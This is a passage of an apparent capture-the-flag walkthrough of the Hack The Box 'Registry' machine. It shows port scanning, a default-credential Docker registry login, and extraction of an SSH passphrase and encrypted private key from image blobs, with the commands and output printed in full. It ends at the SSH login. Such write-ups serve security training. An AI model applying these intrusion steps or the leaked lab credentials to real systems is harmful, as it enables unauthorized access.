Quick Summary
→ My very first Hard box is now retired. A machine where you can exploit if you know what the technology is used. The initial scan has give me a big hint that this machine is using Docker and 3rd party server named REGISTRY Server
.
And in the server there’s a lot container which I downloaded and find an SSH Key
to get in to the machine and get the user.txt
.
On my Privilege Escalation to the box’ I found out that I need to do lateral movement to the www-data
shell which basically the webserver. From that, user can abuse SUDOERS rights
by running the Restic
and create a backup for root directory to my Kali Linux machine and get the shell and root.txt
.
Penetration Testing Methodologies
Network Scanning
→ Nmap scan
→ discover open ports and what services are running
Enumeration
→ Browsing the HTTP Service
→ put the commonName
in /etc/hosts/
file that appear on the Nmap Scan
→ Download and analyze the install file
→ Visit the docker.registry.htb
and Look for interesting stuff in a Docker API
Post - Exploitation
→ Enumerating the Docker API by following this method
→ Found the docker repository that contains image called bolt-image
→ Found the some blobs file from latest
→ Download all the blob files and try to look for a password or ssh key
→ Get in to the Registry machine
Exploitation
→ Enumerate the Bolt CMS Website
→ using LinPEAS i found a hash that I can use for password of the website
→ Looking at configuration I modify the config.yml
and upload 2 webshells as fast as I can to gain www-data
shell.
Privilege Escalation
→ Abuse what www-data
allowed to run which is the restic
→ create snapshot on my Kali linux machine which will be the backup server for restic
→ do reverse SSH in bolt user shell
→ run the restic on www-data
and backup the root directory that will transfer into my machine.
→ get the id_rsa
key on ssh folder, and login as root.
→ Finally rooted and got the root.txt
Network Scanning
Walkthrough
→ First, I run the NMAP to scan the target and get information about the various services that are running on the target machine. I use
- -sV ⇒ Probe open ports to determine service/version info
- -sC ⇒ equivalent to —script=default
- -T 0-5 ⇒ Set timing template - higher is faster (less accurate)
- -p- ⇒ Scan all 65535 ports
- -oN ⇒ to save our scan results to a text file
# bash
nmap -sV -sC -p- -T4 10.10.10.159 -oN nmap-Registry
|
# bash
root in htb/boxes/Registry ❯ nmap -sV -sC -p- -T4 10.10.10.159 -oN nmap-Registry Starting Nmap 7.80 ( https: Warning: 10.10.10.159 giving up on port because retransmission cap hit (6). Nmap scan report for 10.10.10.159 Host is up (0.25s latency). Not shown: 65458 closed ports, 74 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 72:d4:8d:da:ff:9b:94:2a:ee:55:0c:04:30:71:88:93 (RSA) | 256 c7:40:d0:0e:e4:97:4a:4f:f9:fb:b2:0b:33:99:48:6d (ECDSA) |_ 256 78:34:80:14:a1:3d:56:12:b4:0a:98:1f:e6:b4:e8:93 (ED25519) 80/tcp open http nginx 1.14.0 (Ubuntu) |_http-server-header: nginx/1.14.0 (Ubuntu) |_http-title: Welcome to nginx! 443/tcp open ssl/http nginx 1.14.0 (Ubuntu) |_http-server-header: nginx/1.14.0 (Ubuntu) |_http-title: Welcome to nginx! | ssl-cert: Subject: commonName=docker.registry.htb | Not valid before: 2019-05-06T21:14:35 |_Not valid after: 2029-05-03T21:14:35 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https: Nmap done: 1 IP address (1 host up) scanned in 1218.67 seconds
root in htb/boxes/Registry took 20m19s ❯
|
Nmap results
So there’s port open.
- 22 ⇒ which basically use for SSH Connections
- 80 ⇒ which basically running HTTP Service
- 443 ⇒ which running also HTTP/S and have ssl-cert – commonName=docker.registry.htb, I added that on my hosts file.
Enumeration
So I always visit first the HTTP service because that is a website and I got default page of a Nginx Server
.
There’s no hint for that so i try enumerate the website using dirsearch Web path scanner
to look for website page or items which can give me a hints.
Bruteforce Web directories
root in htb/boxes/Registry ❯ python3 /opt/dirsearch/dirsearch.py -u "http://10.10.10.159/" -e asd -t 20 --simple-report=registry-directories
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: asd | HTTP method: get | Threads: 20 | Wordlist size: 6109
Error Log: /opt/dirsearch/logs/errors-20-04-04_07-13-49.log
Target: http://10.10.10.159/
[07:13:49] Starting: [07:13:51] 400 - 182B - /%2e%2e/google.com [07:13:51] 403 - 580B - /.bash_history [07:13:53] 403 - 580B - /.ht_wsr.txt [07:13:53] 403 - 580B - /.hta [07:13:53] 403 - 580B - /.htaccess-dev [07:13:53] 403 - 580B - /.htaccess-local [07:13:53] 403 - 580B - /.htaccess-marco [07:13:53] 403 - 580B - /.htaccess.BAK [07:13:53] 403 - 580B - /.htaccess.bak1 [07:13:53] 403 - 580B - /.htaccess.old [07:13:53] 403 - 580B - /.htaccess.orig [07:13:53] 403 - 580B - /.htaccess.sample [07:13:53] 403 - 580B - /.htaccess.txt [07:13:53] 403 - 580B - /.htaccess.save [07:13:53] 403 - 580B - /.htaccess_extra [07:13:53] 403 - 580B - /.htaccess_orig [07:13:53] 403 - 580B - /.htaccess_sc [07:13:53] 403 - 580B - /.htaccessBAK [07:13:53] 403 - 580B - /.htaccessOLD [07:13:53] 403 - 580B - /.htaccessOLD2 [07:13:53] 403 - 580B - /.htaccess~ [07:13:53] 403 - 580B - /.htgroup [07:13:53] 403 - 580B - /.htpasswd-old [07:13:53] 403 - 580B - /.htpasswd_test [07:13:53] 403 - 580B - /.htpasswds [07:13:53] 403 - 580B - /.htusers [07:14:05] 403 - 580B - /admin/.htaccess [07:14:13] 403 - 580B - /administrator/.htaccess [07:14:17] 403 - 580B - /app/.htaccess [07:14:44] 200 - 612B - /index.html [07:14:45] 301 - 194B - /install -> http://10.10.10.159/install/ [07:14:45] 200 - 1KB - /install/ Task Completed
root in htb/boxes/Registry took 2m4s ❯
|
Get install file
I only got one which is the install
when I added it into the URL it is 404 Page Not found.
but I manage to download the install
using wget
# bash
root in htb/boxes/Registry ❯ wget http: --2020-04-04 07:27:30-- http: Connecting to 10.10.10.159:80... connected. HTTP request sent, awaiting response... 301 Moved Permanently Location: http: --2020-04-04 07:27:30-- http: Reusing existing connection to 10.10.10.159:80. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] Saving to: ‘install’
install [ <=> ] 1.03K --.-KB/s in 0s
2020-04-04 07:27:31 (81.5 MB/s) - ‘install’ saved [1050]
root in htb/boxes/Registry ❯
|
So I thought this was only ordinary a text file but it’s not, is a gzip file so I tried to move into a gzip and decompressed but it’s not working, and I don’t whats wrong so I move on and go the the next phase.
root in htb/boxes/Registry ❯ file install install: gzip compressed data, last modified: Mon Jul 29 23:38:20 2019, from Unix, original size modulo 2^32 167772200 gzip compressed data, reserved method, has CRC, was "", from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 167772200
|
Explore Docker Registry
Next, i visited the docker.registry.htb
and there will be a popup login requesting for username and password, I input admin:admin
on that and it’s displaying a JSON API
page.
and the JSON API
Post - Exploitation
Next, I search for Docker api registry exploitation
and I didn’t failed. I found this awesome article which help me to get a password for SSH Key by exploring each blobs file.
So based on the method of the article, I look first at the /v2/_catalog
and there’s a docker repository called "bolt-image"
and it is basically a collection of related images.
Diving the Docker Repository
Next I added /tags/list
and there was repository install called latest
trying to look at the /manifest/v2
To download the file latest
I added simply this in the url /manifest/latest
.
Open this file and we will see a lot of blobSum does have the latest
repository in a Docker registry. Each of them will contains some info like password, files, ssh key etc.
Here are some blobs from latest.
root in htb/boxes/Registry ❯ cat latest
{ "schemaVersion": 1, "name": "bolt-image", "tag": "latest", "architecture": "amd64", "fsLayers": [ { "blobSum": "sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b" }, { "blobSum": "sha256:3f12770883a63c833eab7652242d55a95aea6e2ecd09e21c29d7d7b354f3d4ee" }, { "blobSum": "sha256:02666a14e1b55276ecb9812747cb1a95b78056f1d202b087d71096ca0b58c98c" }, { "blobSum": "sha256:c71b0b975ab8204bb66f2b659fa3d568f2d164a620159fc9f9f185d958c352a7" }, { "blobSum": "sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791" }, { "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4" }, { "blobSum": "sha256:f5029279ec1223b70f2cbb2682ab360e1837a2ea59a8d7ff64b38e9eab5fb8c0" }, { "blobSum": "sha256:d9af21273955749bb8250c7a883fcce21647b54f5a685d237bc6b920a2ebad1a" }, { "blobSum": "sha256:8882c27f669ef315fc231f272965cd5ee8507c0f376855d6f9c012aae0224797" }, { "blobSum": "sha256:f476d66f540886e2bb4d9c8cc8c0f8915bca7d387e536957796ea6c2f8e7dfff" } ], "history": [ { "v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"e2e880122289\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"bash\"],\"Image\":\"docker.registry.htb/bolt-image\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"container\":\"e2e88012228993b25b697ee37a0aae0cb0ecef7b1536d2b8e488a6ec3f353f14\",\"container_config\":{\"Hostname\":\"e2e880122289\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"bash\"],\"Image\":\"docker.registry.htb/bolt-image\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"created\":\"2019-05-25T15:18:56.9530238Z\",\"docker_version\":\"18.09.2\",\"id\":\"f18c41121574af38e7d88d4f5d7ea9d064beaadd500d13d33e8c419d01aa5ed5\",\"os\":\"linux\",\"parent\":\"9380d9cebb5bc76f02081749a8e795faa5b5cb638bf5301a1854048ff6f8e67e\"}" }, { "v1Compatibility": "{\"id\":\"9380d9cebb5bc76f02081749a8e795faa5b5cb638bf5301a1854048ff6f8e67e\",\"parent\":\"d931b2ca04fc8c77c7cbdce00f9a79b1954e3509af20561bbb8896916ddd1c34\",\"created\":\"2019-05-25T15:13:31.3975799Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}" }, { "v1Compatibility": "{\"id\":\"d931b2ca04fc8c77c7cbdce00f9a79b1954e3509af20561bbb8896916ddd1c34\",\"parent\":\"489e49942f587534c658da9060cbfc0cdb999865368926fab28ccc7a7575283a\",\"created\":\"2019-05-25T14:57:27.6745842Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}" }, { "v1Compatibility": "{\"id\":\"489e49942f587534c658da9060cbfc0cdb999865368926fab28ccc7a7575283a\",\"parent\":\"7f0ab92fdf7dd172ef58247894413e86cfc60564919912343c9b2e91cd788ae4\",\"created\":\"2019-05-25T14:47:52.6859489Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}" }, { "v1Compatibility": "{\"id\":\"7f0ab92fdf7dd172ef58247894413e86cfc60564919912343c9b2e91cd788ae4\",\"parent\":\"5f7e711dba574b5edd0824a9628f3b91bfd20565a5630bbd70f358f0fc4ebe95\",\"created\":\"2019-05-24T22:51:14.8744838Z\",\"container_config\":{\"Cmd\":[\"/bin/bash\"]}}" }, { "v1Compatibility": "{\"id\":\"5f7e711dba574b5edd0824a9628f3b91bfd20565a5630bbd70f358f0fc4ebe95\",\"parent\":\"f75463b468b510b7850cd69053a002a6f10126be3764b570c5f80a7e5044974c\",\"created\":\"2019-04-26T22:21:05.100534088Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) CMD [\\\"/bin/bash\\\"]\"]},\"throwaway\":true}" }, { "v1Compatibility": "{\"id\":\"f75463b468b510b7850cd69053a002a6f10126be3764b570c5f80a7e5044974c\",\"parent\":\"4b937c36cc17955293cc01d8c7c050c525d22764fa781f39e51afbd17e3e5529\",\"created\":\"2019-04-26T22:21:04.936777709Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c mkdir -p /run/systemd \\u0026\\u0026 echo 'docker' \\u003e /run/systemd/container\"]}}" }, { "v1Compatibility": "{\"id\":\"4b937c36cc17955293cc01d8c7c050c525d22764fa781f39e51afbd17e3e5529\",\"parent\":\"ab4357bfcbef1a7eaa70cfaa618a0b4188cccafa53f18c1adeaa7d77f5e57939\",\"created\":\"2019-04-26T22:21:04.220422684Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c rm -rf /var/lib/apt/lists/*\"]}}" }, { "v1Compatibility": "{\"id\":\"ab4357bfcbef1a7eaa70cfaa618a0b4188cccafa53f18c1adeaa7d77f5e57939\",\"parent\":\"f4a833e38a779e09219325dfef9e5063c291a325cad7141bcdb4798ed68c675c\",\"created\":\"2019-04-26T22:21:03.471632173Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c set -xe \\t\\t\\u0026\\u0026 echo '#!/bin/sh' \\u003e /usr/sbin/policy-rc.d \\t\\u0026\\u0026 echo 'exit 101' \\u003e\\u003e /usr/sbin/policy-rc.d \\t\\u0026\\u0026 chmod +x /usr/sbin/policy-rc.d \\t\\t\\u0026\\u0026 dpkg-divert --local --rename --add /sbin/initctl \\t\\u0026\\u0026 cp -a /usr/sbin/policy-rc.d /sbin/initctl \\t\\u0026\\u0026 sed -i 's/^exit.*/exit 0/' /sbin/initctl \\t\\t\\u0026\\u0026 echo 'force-unsafe-io' \\u003e /etc/dpkg/dpkg.cfg.d/docker-apt-speedup \\t\\t\\u0026\\u0026 echo 'DPkg::Post-Invoke { \\\"rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true\\\"; };' \\u003e /etc/apt/apt.conf.d/docker-clean \\t\\u0026\\u0026 echo 'APT::Update::Post-Invoke { \\\"rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true\\\"; };' \\u003e\\u003e /etc/apt/apt.conf.d/docker-clean \\t\\u0026\\u0026 echo 'Dir::Cache::pkgcache \\\"\\\"; Dir::Cache::srcpkgcache \\\"\\\";' \\u003e\\u003e /etc/apt/apt.conf.d/docker-clean \\t\\t\\u0026\\u0026 echo 'Acquire::Languages \\\"none\\\";' \\u003e /etc/apt/apt.conf.d/docker-no-languages \\t\\t\\u0026\\u0026 echo 'Acquire::GzipIndexes \\\"true\\\"; Acquire::CompressionTypes::Order:: \\\"gz\\\";' \\u003e /etc/apt/apt.conf.d/docker-gzip-indexes \\t\\t\\u0026\\u0026 echo 'Apt::AutoRemove::SuggestsImportant \\\"false\\\";' \\u003e /etc/apt/apt.conf.d/docker-autoremove-suggests\"]}}" }, { "v1Compatibility": "{\"id\":\"f4a833e38a779e09219325dfef9e5063c291a325cad7141bcdb4798ed68c675c\",\"created\":\"2019-04-26T22:21:02.724843678Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:7ce84f13f11609a50ece7823578159412e2299c812746d1d1f1ed5db0728bd37 in / \"]}}" } ], "signatures": [ { "header": { "jwk": { "crv": "P-256", "kid": "VUEK:AQ5E:PKKZ:YK3J:YU44:72EU:GB57:BMI2:QMIK:DZEH:73WL:Q7BY", "kty": "EC", "x": "yS0jBSmoO13WXoTRXRcp_OsqPZ3-ttTv3biBxexcyCo", "y": "JpwUWLV6IwW720h8XgeRpCvPoeZ_f8I82qIprZvEgm4" }, "alg": "ES256" }, "signature": "9E2loVJqpUIUj3EnEIrSKzOWaHvHKEsdAgcPX8sr152QKzWw3J7SgwLOnXPaJWegHyjYjTDnsNyEauNF8_J2SA", "protected": "eyJmb3JtYXRMZW5ndGgiOjY3OTIsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAyMC0wNC0wNFQwMDoyNzo1MVoifQ" } ] }
|
Exploring the blobSums
So I need to explore each blobSum, i will download each using wget and look for interesting stuffs. so:
# bash
root in htb/boxes/Registry ❯ wget --no-check-certificate --http-user=admin --http-password=admin https: --2020-04-04 08:38:15-- https: Resolving docker.registry.htb (docker.registry.htb)... 10.10.10.159 Connecting to docker.registry.htb (docker.registry.htb)|10.10.10.159|:443... connected. WARNING: The certificate of ‘docker.registry.htb’ is not trusted. WARNING: The certificate of ‘docker.registry.htb’ doesn't have a known issuer. HTTP request sent, awaiting response... 401 Unauthorized Authentication selected: Basic realm="Registry" Reusing existing connection to docker.registry.htb:443. HTTP request sent, awaiting response... 200 OK Length: 335 [application/octet-stream] Saving to: ‘sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b’
sha256:302bfcb3f10c386a25a58913917257bd2fe7721 100%[===================================================================================================>] 335 --.-KB/s in 0s
2020-04-04 08:38:16 (250 MB/s) - ‘sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b’ saved [335/335]
root in htb/boxes/Registry ❯ ls install install.gz latest nmap-Registry registry-directories sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b
|
Then i will moved it to into .gz
file and decompressed it.
root in htb/boxes/Registry ❯ mv sha256\:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b sha256\:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b.gz
root in htb/boxes/Registry ❯ gunzip sha256\:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b.gz
|
Finally i can now read whats is on the first blob.
root in htb/boxes/Registry ❯ cat sha256\:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b etc/0040755000000000000000000000000013472256035010032 5ustar0000000000000000etc/profile.d/0040755000000000000000000000000013472256264011720 5ustar0000000000000000etc/profile.d/01-ssh.sh0100755000000000000000000000033613472067523013267 0ustar0000000000000000#!/usr/bin/expect -f
spawn ssh-add /root/.ssh/id_rsa expect "Enter passphrase for /root/.ssh/id_rsa:" send "GkOcz221Ftb3ugog\n"; expect "Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)" interact etc/profile.d/.wh.02-ssh.sh0000600000000000000000000000000013472256232013730 0ustar0000000000000000 root in htb/boxes/Registry ❯
|
Base on the first blob i download it looks like the "GkOcz221Ftb3ugog"
is a password for SSH Key but I don’t have the id_rsa
which is needed as from this line.
expect "Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)"
|
Hunting the Private key
So i need more blobSum to get the id_rsa key
, the 2nd blob was empty. and thid blob looks interesting this one is 100 mb total of files so:
root in boxes/Registry/docker ❯ wget --no-check-certificate --http-user=admin --http-password=admin https://docker.registry.htb/v2/bolt-image/blobs/sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791 --2020-04-04 09:03:19-- https://docker.registry.htb/v2/bolt-image/blobs/sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791 Resolving docker.registry.htb (docker.registry.htb)... 10.10.10.159 Connecting to docker.registry.htb (docker.registry.htb)|10.10.10.159|:443... connected. WARNING: The certificate of ‘docker.registry.htb’ is not trusted. WARNING: The certificate of ‘docker.registry.htb’ doesn't have a known issuer. HTTP request sent, awaiting response... 401 Unauthorized Authentication selected: Basic realm="Registry" Reusing existing connection to docker.registry.htb:443. HTTP request sent, awaiting response... 200 OK Length: 104569678 (100M) [application/octet-stream] Saving to: ‘sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791’
sha256:2931a8b44e495489fdbe2bccd7232e99b182034 100%[===================================================================================================>] 99.72M 752KB/s in 2m 56s
2020-04-04 09:06:16 (580 KB/s) - ‘sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791’ saved [104569678/104569678]
root in boxes/Registry/docker took 2m57s ❯
|
Get in into the REGISTRY
after the download finished I explore the /root
directory which contains the .ssh
directory which has id_rsa
and config
file.
I look first at the config file and the user for SSH is bolt
Host registry User bolt Port 22 Hostname registry.htb
root in sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791 (1)/root/.ssh
|
and the RSA Key
root in boxes/Registry/docker ❯ cat id_rsa -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,1C98FA248505F287CCC597A59CF83AB9
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 Bdtfi9goJBFb6P7yHapZ13W30b96ZQG4Gdf4ZeV6MPMizcTbiggZRBokZLCBMb5H pgkPgTrGJlbm+sLu/kt4jgex3T/NWwXHVrny5kIuTbbv1fXfyfkPqU66eysstO2s OxciNk4W41o9YqHHYM9D/uL6xMqO3K/LTYUI+LcCK13pkjP7/zH+bqiClfNt0D2B Xg6OWYK7E/DTqX+7zqNQp726sDAYKqQNpwgHldyDhOG3i8o66mLj3xODHQzBvwKR bJ7jrLPW+AmQwo/V8ElNFPyP6oZBEdoNVn/plMDAi0ZzBHJc7hJ0JuHnMggWFXBM PjxG/w4c8XV/Y2WavafEjT7hHuviSo6phoED5Zb3Iu+BU+qoEaNM/LntDwBXNEVu Z0pIXd5Q2EloUZDXoeyMCqO/NkcIFkx+//BDddVTFmfw21v2Y8fZ2rivF/8CeXXZ ot6kFb4G6gcxGpqSZKY7IHSp49I4kFsC7+tx7LU5/wqC9vZfuds/TM7Z+uECPOYI f41H5YN+V14S5rU97re2w49vrBxM67K+x930niGVHnqk7t/T1jcErROrhMeT6go9 RLI9xScv6aJan6xHS+nWgxpPA7YNo2rknk/ZeUnWXSTLYyrC43dyPS4FvG8N0H1V 94Vcvj5Kmzv0FxwVu4epWNkLTZCJPBszTKiaEWWS+OLDh7lrcmm+GP54MsLBWVpr -----END RSA PRIVATE KEY-----
root in sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791 (1)/root/.ssh ❯
|
I move the the id_rsa in my registry directory and do the SSH Login so:
root in htb/boxes/Registry ❯ ssh -v -i id_rsa bolt@registry.htb OpenSSH_8.1p1 Debian-1, OpenSSL 1.1.1d 10 Sep 2019 debug1: Reading configuration data /etc/ssh/ssh_config debug1: /etc/ssh/ssh_config line 19: Applying options for * debug1: Connecting to registry.htb [10.10.10.159] port 22. debug1: Connection established. debug1: identity file id_rsa type 0 debug1: identity file id_rsa-cert type -1 debug1: Local version string SSH-2.0-OpenSSH_8.1p1 Debian-1 debug1: Remote protocol version 2.0, remote software version OpenSSH_7.6p1 Ubuntu-4ubuntu0.3 debug1: match: OpenSSH_7.6p1 Ubuntu-4ubuntu0.3 pat OpenSSH_7.0*,OpenSSH_7.1*,OpenSSH_7.2*,OpenSSH_7.3*,OpenSSH_7.4*,OpenSSH_7.5*,OpenSSH_7.6*,OpenSSH_7.7* compat 0x04000002 debug1: Authenticating to registry.htb:22 as 'bolt' debug1: SSH2_MSG_KEXINIT sent debug1: SSH2_MSG_KEXINIT received debug1: kex: algorithm: curve25519-sha256 debug1: kex: host key algorithm: ecdsa-sha2-nistp256 debug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none debug1: expecting SSH2_MSG_KEX_ECDH_REPLY debug1: Server host key: ecdsa-sha2-nistp256 SHA256:G1J5ek/T6KuCCT7Xp2IN1LUslRt24mhmhKUo/kWWVrs debug1: Host 'registry.htb' is known and matches the ECDSA host key. debug1: Found key in /root/.ssh/known_hosts:5 debug1: rekey out after 134217728 blocks debug1: SSH2_MSG_NEWKEYS sent debug1: expecting SSH2_MSG_NEWKEYS debug1: SSH2_MSG_NEWKEYS received debug1: rekey in after 134217728 blocks debug1: Will attempt key: id_rsa RSA SHA256:XYmIvRC1pWwn6TnuAismBkezuFTeVa0viiqKVkR36w4 explicit debug1: SSH2_MSG_EXT_INFO received debug1: kex_input_ext_info: server-sig-algs=<ssh-ed25519,ssh-rsa,rsa-sha2-256,rsa-sha2-512,ssh-dss,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521> debug1: SSH2_MSG_SERVICE_ACCEPT received debug1: Authentications that can continue: publickey,password debug1: Next authentication method: publickey debug1: Offering public key: id_rsa RSA SHA256:XYmIvRC1pWwn6TnuAismBkezuFTeVa0viiqKVkR36w4 explicit debug1: Server accepts key: id_rsa RSA SHA256:XYmIvRC1pWwn6TnuAismBkezuFTeVa0viiqKVkR36w4 explicit Enter passphrase for key 'id_rsa': debug1: Authentication succeeded (publickey). Authenticated to registry.htb ([10.10.10.159]:22). debug1: channel 0: new [client-session] debug1: Requesting no-more-sessions@openssh.com debug1: Entering interactive session. debug1: pledge: network debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0 debug1: Sending environment. debug1: Sending env LANG = en_US.utf8 Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)
System information as of Sat Apr 4 01:14:31 UTC 2020
